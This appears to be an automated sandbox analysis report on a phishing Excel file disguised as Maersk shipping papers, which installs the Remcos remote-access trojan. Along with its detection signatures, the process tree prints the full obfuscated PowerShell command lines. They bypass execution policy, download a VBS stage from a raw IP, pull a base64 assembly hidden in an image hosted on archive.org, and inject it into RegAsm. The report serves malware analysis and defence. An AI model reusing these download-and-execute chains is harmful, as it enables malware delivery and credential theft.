Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Maersk BL, IN & PL.xls

Overview

General Information

Sample name:Maersk BL, IN & PL.xls
Analysis ID:1529029
MD5:060f7cc392bbfe1f450ea163a727a875
SHA1:ba5a0d8b52ec29b42a4ad9bd8e4f71695e91462c
SHA256:8db643d86e49f12a186bce4de89c247029269bcd9d99ac45dc5535efaa5379b3
Tags:Maerskxlsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3564 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3852 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3944 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3968 cmdline: POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 4088 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2908 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES781D.tmp" "c:\Users\user\AppData\Local\Temp\nnmswnbn\CSC2F3646BAED0D4162AB721EA9AB40E2EA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 2632 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 2476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 3592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 3888 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 3768 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tkloyslrzegxfpgbpcmonko" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 3764 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\emrhylvlvnykqvcfgfgpxwbgnd" MD5: 8FE9545E9F72E460723F484C304314AD)
    • mshta.exe (PID: 2104 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 2244 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 1840 cmdline: POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 2672 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3360 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB635.tmp" "c:\Users\user\AppData\Local\Temp\op4j5mgw\CSC61FD86854EBB47F380D5789CC9CFF7A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 2368 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 4040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 3180 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
